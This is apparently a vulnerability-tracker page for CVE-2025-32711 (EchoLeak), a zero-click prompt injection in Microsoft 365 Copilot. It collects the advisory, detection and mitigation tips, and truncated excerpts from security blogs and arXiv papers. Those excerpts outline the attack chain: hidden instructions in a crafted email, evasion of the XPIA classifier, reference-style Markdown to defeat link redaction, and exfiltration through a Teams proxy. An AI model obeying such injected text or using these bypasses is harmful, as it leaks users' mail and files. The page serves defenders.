CVE-2025-32711
published 2025-06-11CVE-2025-32711: Ai command injection in M365 Copilot allows an unauthorized attacker to disclose information over a network.
PriorityP354high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EPSS
5.78%
92.2th percentile
Ai command injection in M365 Copilot allows an unauthorized attacker to disclose information over a network.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | microsoft_365_copilot | — | — |
| msrc | microsoft_365_copilot | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Inspect Copilot prompt and response traffic for reference-style Markdown link patterns that may be used to bypass link redaction controls and smuggle exfiltration URLs. ↗
- →Alert on Copilot responses that include outbound requests to Microsoft Teams proxy endpoints not initiated by direct user action, as this was the exfiltration channel leveraged in EchoLeak. ↗
- →Use NLP-based email intent analysis to flag emails whose content, when parsed as instructions, would direct an AI assistant to exfiltrate data—even if the email appears benign to human readers. ↗
- →Monitor for XPIA (Cross Prompt Injection Attempt) classifier evasion patterns in emails processed by M365 Copilot, as EchoLeak specifically chained bypasses of Microsoft's XPIA classifier. ↗
- ·Microsoft patched EchoLeak server-side in May 2025; no customer action is required for the patch itself, but configuration hardening is still recommended. ↗
- ·Disabling external email context in Copilot settings is a recommended mitigation to reduce the RAG attack surface for this class of prompt injection. ↗
- ·Restricting markdown rendering in AI outputs reduces the prompt injection risk surface, particularly for reference-style Markdown link exfiltration. ↗
- ·Existing defenses (e.g., retrieval filtering) are insufficient to prevent retrieval of optimized malicious text; adaptive attack variants can bypass them. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vendor_msrc9.3CRITICAL
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-h2w9-p5qf-qmrh: Ai command injection in M365 Copilot allows an unauthorized attacker to disclose information over a network
ghsa_unreviewed·2025-06-11
CVE-2025-32711 [CRITICAL] CWE-74 GHSA-h2w9-p5qf-qmrh: Ai command injection in M365 Copilot allows an unauthorized attacker to disclose information over a network
Ai command injection in M365 Copilot allows an unauthorized attacker to disclose information over a network.
Microsoft
M365 Copilot Information Disclosure Vulnerability
vendor_msrc·2025-06-10·CVSS 9.3
CVE-2025-32711 [CRITICAL] CWE-74 M365 Copilot Information Disclosure Vulnerability
M365 Copilot Information Disclosure Vulnerability
Description: Ai command injection in M365 Copilot allows an unauthorized attacker to disclose information over a network.
FAQ: Why are there no links to an update or instructions with steps that must be taken to protect from this vulnerability?
This vulnerability has already been fully mitigated by Microsoft. There is no action for users of this service to take. The purpose of this CVE is to provide further transparency.
Please see Toward greater transparency: Unveiling Cloud Service CVEs for more information.
M365 Copilot: M365 Copilot
Microsoft: Microsoft
Customer Action Required: No
Impact: Information Disclosure
Exploit Status: Publicly Disclosed:No;Exploited:No;Latest Software Release:Exploitation Less Likely
No detection rules found.
No public exploits indexed.
Hackernews
One-Click Microsoft 365 Copilot Flaw Could Have Let Attackers Steal Emails, Files, and MFA Codes
blogs_hackernews·2026-06-15·CVSS 7.5
CVE-2026-42824 [HIGH] One-Click Microsoft 365 Copilot Flaw Could Have Let Attackers Steal Emails, Files, and MFA Codes
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## One-Click Microsoft 365 Copilot Flaw Could Have Let Attackers Steal Emails, Files, and MFA Codes
A single click on a trusted Microsoft link could have let an attacker pull emails, calendar details, and indexed files out of Microsoft 365 Copilot Enterprise Search.
Researchers at Varonis Threat Labs chained three bugs into a one-click exfiltration path they call SearchLeak . Because the link pointed to a real microsoft.com domain, traditional anti-phishing and URL filtering tools were unlikely to flag it.
No prompt, no password, no second click. Microsoft assigned CVE-2026-42824 and marked it critical; the CVSS scores ran low
Trendmicro
Preventing Zero-Click AI Threats: Insights from EchoLeak
blogs_trendmicro·2025-07-15·CVSS 9.3
CVE-2025-32711 [CRITICAL] Preventing Zero-Click AI Threats: Insights from EchoLeak
Artificial Intelligence (AI)
## Preventing Zero-Click AI Threats: Insights from EchoLeak
A zero-click exploit called EchoLeak reveals how AI assistants like Microsoft 365 Copilot can be manipulated to leak sensitive data without user interaction. This entry breaks down how the attack works, why it matters, and what defenses are available to proactively mitigate this emerging AI-native threat.
By: Trend Micro Jul 15, 2025 Read time: ( words)
Save to Folio
EchoLeak ( CVE-2025-32711 ) is a recently discovered vulnerability in Microsoft 365 Copilot, made more nefarious by its zero-click nature, meaning it requires no user interaction to succeed. It demonstrates how helpful systems can open the door to entirely new forms of attack— no malware, no phishing required—just the unquestioning ob
Trendmicro
Preventing Zero-Click AI Threats: Insights from EchoLeak
blogs_trendmicro·2025-07-15·CVSS 9.3
[CRITICAL] Preventing Zero-Click AI Threats: Insights from EchoLeak
Artificial Intelligence (AI)
# Preventing Zero-Click AI Threats: Insights from EchoLeak
A zero-click exploit called EchoLeak reveals how AI assistants like Microsoft 365 Copilot can be manipulated to leak sensitive data without user interaction. This entry breaks down how the attack works, why it matters, and what defenses are available to proactively mitigate this emerging AI-native threat.
By: Trend Micro
2025/07/15
Read time: ( words)
Save to Folio
## Key Takeaways
- EchoLeak is a zero-click AI vulnerability that exploits Copilot’s use of historical contextual data to silently execute hidden prompts without user interaction.
- The attack method relies on embedded invisible prompt injection—such as HTML comments or white-on-white text—designed to hijack GenAI interpretation at a l
Trendmicro
Preventing Zero-Click AI Threats: Insights from EchoLeak
blogs_trendmicro·2025-07-15·CVSS 9.3
CVE-2025-32711 [CRITICAL] Preventing Zero-Click AI Threats: Insights from EchoLeak
Inteligencia artificial (IA)
## Preventing Zero-Click AI Threats: Insights from EchoLeak
A zero-click exploit called EchoLeak reveals how AI assistants like Microsoft 365 Copilot can be manipulated to leak sensitive data without user interaction. This entry breaks down how the attack works, why it matters, and what defenses are available to proactively mitigate this emerging AI-native threat.
By: Trend Micro Jul 15, 2025 Read time: ( words)
Save to Folio
EchoLeak ( CVE-2025-32711 ) is a recently discovered vulnerability in Microsoft 365 Copilot, made more nefarious by its zero-click nature, meaning it requires no user interaction to succeed. It demonstrates how helpful systems can open the door to entirely new forms of attack— no malware, no phishing required—just the unquestioning ob
Trendmicro
Preventing Zero-Click AI Threats: Insights from EchoLeak
blogs_trendmicro·2025-07-15·CVSS 9.3
CVE-2025-32711 [CRITICAL] Preventing Zero-Click AI Threats: Insights from EchoLeak
Künstliche Intelligenz (KI)
## Preventing Zero-Click AI Threats: Insights from EchoLeak
A zero-click exploit called EchoLeak reveals how AI assistants like Microsoft 365 Copilot can be manipulated to leak sensitive data without user interaction. This entry breaks down how the attack works, why it matters, and what defenses are available to proactively mitigate this emerging AI-native threat.
By: Trend Micro Jul 15, 2025 Read time: ( words)
Save to Folio
EchoLeak ( CVE-2025-32711 ) is a recently discovered vulnerability in Microsoft 365 Copilot, made more nefarious by its zero-click nature, meaning it requires no user interaction to succeed. It demonstrates how helpful systems can open the door to entirely new forms of attack— no malware, no phishing required—just the unquestioning obe
Trendmicro
Preventing Zero-Click AI Threats: Insights from EchoLeak
blogs_trendmicro·2025-07-15·CVSS 9.3
CVE-2025-32711 [CRITICAL] Preventing Zero-Click AI Threats: Insights from EchoLeak
Artificial Intelligence (AI)
## Preventing Zero-Click AI Threats: Insights from EchoLeak
A zero-click exploit called EchoLeak reveals how AI assistants like Microsoft 365 Copilot can be manipulated to leak sensitive data without user interaction. This entry breaks down how the attack works, why it matters, and what defenses are available to proactively mitigate this emerging AI-native threat.
By: Trend Micro 2025/07/15 Read time: ( words)
Save to Folio
EchoLeak ( CVE-2025-32711 ) is a recently discovered vulnerability in Microsoft 365 Copilot, made more nefarious by its zero-click nature, meaning it requires no user interaction to succeed. It demonstrates how helpful systems can open the door to entirely new forms of attack— no malware, no phishing required—just the unquestioning obed
arXiv
AgentSentry: Mitigating Indirect Prompt Injection in LLM Agents via Temporal Causal Diagnostics and Context Purification
arxiv_fulltext·2026-02-26
AgentSentry: Mitigating Indirect Prompt Injection in LLM Agents via Temporal Causal Diagnostics and Context Purification
AgentSentry: Mitigating Indirect Prompt Injection in LLM Agents via Temporal Causal Diagnostics and Context Purification
Tian Zhang^1
Yiwei Xu^1
Juan Wang^1*
Keyan Guo^2
Xiaoyang Xu^1
Bowen Xiao^1
Quanlong Guan^3
Jinlin Fan^1
Jiawei Liu^1
Zhiquan Liu^4
Hongxin Hu^2
0.6em
^1 Key Laboratory of Aerospace Information Security and Trusted Computing, Ministry of Education,
School of Cyber Science and Engineering, Wuhan University, Wuhan 430072, China
^2 Department of Computer Science and Engineering, University at Buffalo, SUNY
^3 Department of Computer Science, College of Information Science and Technology, Jinan University, Guangzhou 510632, China
^4 College of Cyber Security, Jinan University, Guangzhou 510632, China
\tianzhang2025, yiweix, jwang, xiaoyangx, bwxiao, mmdx_t\@whu.edu.cn
arXiv
Human Society-Inspired Approaches to Agentic AI Security: The 4C Framework
arxiv_fulltext·2026-02-02
Human Society-Inspired Approaches to Agentic AI Security: The 4C Framework
Human Society-Inspired Approaches to Agentic AI Security: The 4C Framework
Alsharif Abuadbba
CSIRO's Data61
Australia
[email protected]
Nazatul Sultan
CSIRO's Data61
Australia
[email protected]
Surya Nepal
CSIRO's Data61
Australia
[email protected]
Sanjay Jha
University of New South Wales, Sydney
Australia
[email protected]
Alsharif Abuadbba et al.
CCSXML
10002978.10002991
Security and privacy Security services
500
CCSXML
AI is moving from domain-specific autonomy in closed, predictable settings to large-language-model-driven agents that plan and act in open, cross-organizational environments. As a result, the cybersecurity risk landscape is changing in fundamental ways. Agentic AI systems can plan, act, collaborate, and persist over
arXiv
Overcoming the Retrieval Barrier: Indirect Prompt Injection in the Wild for LLM Systems
arxiv_fulltext·2026-01-11
Overcoming the Retrieval Barrier: Indirect Prompt Injection in the Wild for LLM Systems
Hongyan Chang, Ergute Bao, Xinjian LuoCorresponding author., Ting Yu
Mohamed bin Zayed University of Artificial Intelligence
## Abstract
Large language models (LLMs) increasingly rely on retrieving information from external corpora. This creates a new attack surface: indirect prompt injection (IPI), where hidden instructions are planted in the corpora and hijack model behavior once retrieved. Previous studies have highlighted this risk but often avoid the hardest step: ensuring that malicious content is actually retrieved. In practice, unoptimized IPI is rarely retrieved under natural queries, which leaves its real-world impact unclear.
We address this challenge by decomposing the malicious content into a that guarantees retrieval and an that encodes arbitrary attack objectives. Based
arXiv
Securing the Model Context Protocol (MCP): Risks, Controls, and Governance
arxiv_fulltext·2025-11-25
Securing the Model Context Protocol (MCP): Risks, Controls, and Governance
Securing the Model Context Protocol (MCP):
Risks, Controls, and Governance
Herman Errico
Vanta
Email: [email protected]
Jiquan Ngiam
MintMCP
Email: [email protected]
Shanita Sojan
Darktrace
Email: [email protected]
## Abstract
The Model Context Protocol (MCP) replaces static, developer-controlled API integrations with more dynamic, user-driven agent systems, which also introduces new security risks. As MCP adoption grows across community servers and major platforms, organizations encounter threats that existing AI governance frameworks (such as NIST AI RMF and ISO/IEC 42001) do not yet cover in detail. We focus on three types of adversaries that take advantage of MCP’s flexibility: content-injection attackers that embed malicious instructions into otherwise legitim
arXiv
EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit in a Production LLM System
arxiv_cs_cr·2025-09-06·CVSS 9.3
CVE-2025-32711 [CRITICAL] EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit in a Production LLM System
EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit in a Production LLM System
Large language model (LLM) assistants are increasingly integrated into enterprise workflows, raising new security concerns as they bridge internal and external data sources. This paper presents an in-depth case study of EchoLeak (CVE-2025-32711), a zero-click prompt injection vulnerability in Microsoft 365 Copilot that enabled remote, unauthenticated data exfiltration via a single crafted email. By chaining multiple bypasses-evading Microsofts XPIA (Cross Prompt Injection Attempt) classifier, circumventing link redaction with reference-style Markdown, exploiting auto-fetched images, and abusing a Microsoft Teams proxy allowed by the content security policy-EchoLeak achieved full privilege escalat
arXiv
EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit in a Production LLM System
arxiv_fulltext·2025-09-06·CVSS 9.3
CVE-2025-32711 [CRITICAL] EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit in a Production LLM System
## Abstract
Large language model (LLM) assistants are increasingly integrated into enterprise workflows, raising new security concerns as they bridge internal and external data sources. This paper presents an in-depth case study of EchoLeak (CVE-2025-32711), a zero-click prompt injection vulnerability in Microsoft 365 Copilot that enabled remote, unauthenticated data exfiltration via a single crafted email. By chaining multiple bypasses--evading Microsoft’s XPIA (Cross Prompt Injection Attempt) classifier, circumventing link redaction with reference-style Markdown, exploiting auto-fetched images, and abusing a Microsoft Teams proxy allowed by the content security policy, EchoLeak achieved full privilege escalation across LLM trust boundaries without user interaction. We analyze why existi
2025-06-11
Published